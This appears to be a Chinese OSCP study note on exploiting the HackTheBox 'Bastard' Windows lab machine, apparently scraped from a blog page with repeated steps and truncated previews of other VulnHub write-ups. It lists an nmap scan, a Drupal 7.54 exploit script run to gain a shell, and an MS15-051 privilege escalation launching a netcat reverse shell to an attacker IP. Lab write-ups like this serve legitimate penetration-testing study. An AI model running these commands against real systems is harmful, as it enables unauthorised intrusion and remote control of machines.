OSCP备考_0x40_HackThBox靶机_Windows_Bastard
nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.253.131 (扫描TCP)

查看到是Drupal 7.54

ruby 44449.rb http://10.129.253.131
获取到shell

开始操作提权
ms15-051x64.exe "nc.exe -nv 10.10.16.43 4445 -e cmd"



nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.253.131 (扫描TCP)

查看到是Drupal 7.54

ruby 44449.rb http://10.129.253.131
获取到shell

开始操作提权
ms15-051x64.exe "nc.exe -nv 10.10.16.43 4445 -e cmd"



nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.254.155 (扫描TCP)查看到版本是2.3,有rcepython3 49125.p...
nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.221.74 (扫描TCP)nmap -sU --top-ports 100 ...
名称说明靶机下载链接https://www.vulnhub.com/entry/derpnstink-1,221/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192...
名称说明靶机下载链接https://www.vulnhub.com/entry/matrix-3,326/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168...
名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-12-3,24/攻击机(kali)ip:192.168.233.168靶机(CentOS)...
名称说明靶机下载链接攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168.233.184arp-scan 192.168.233.1/24nmap -p- 1...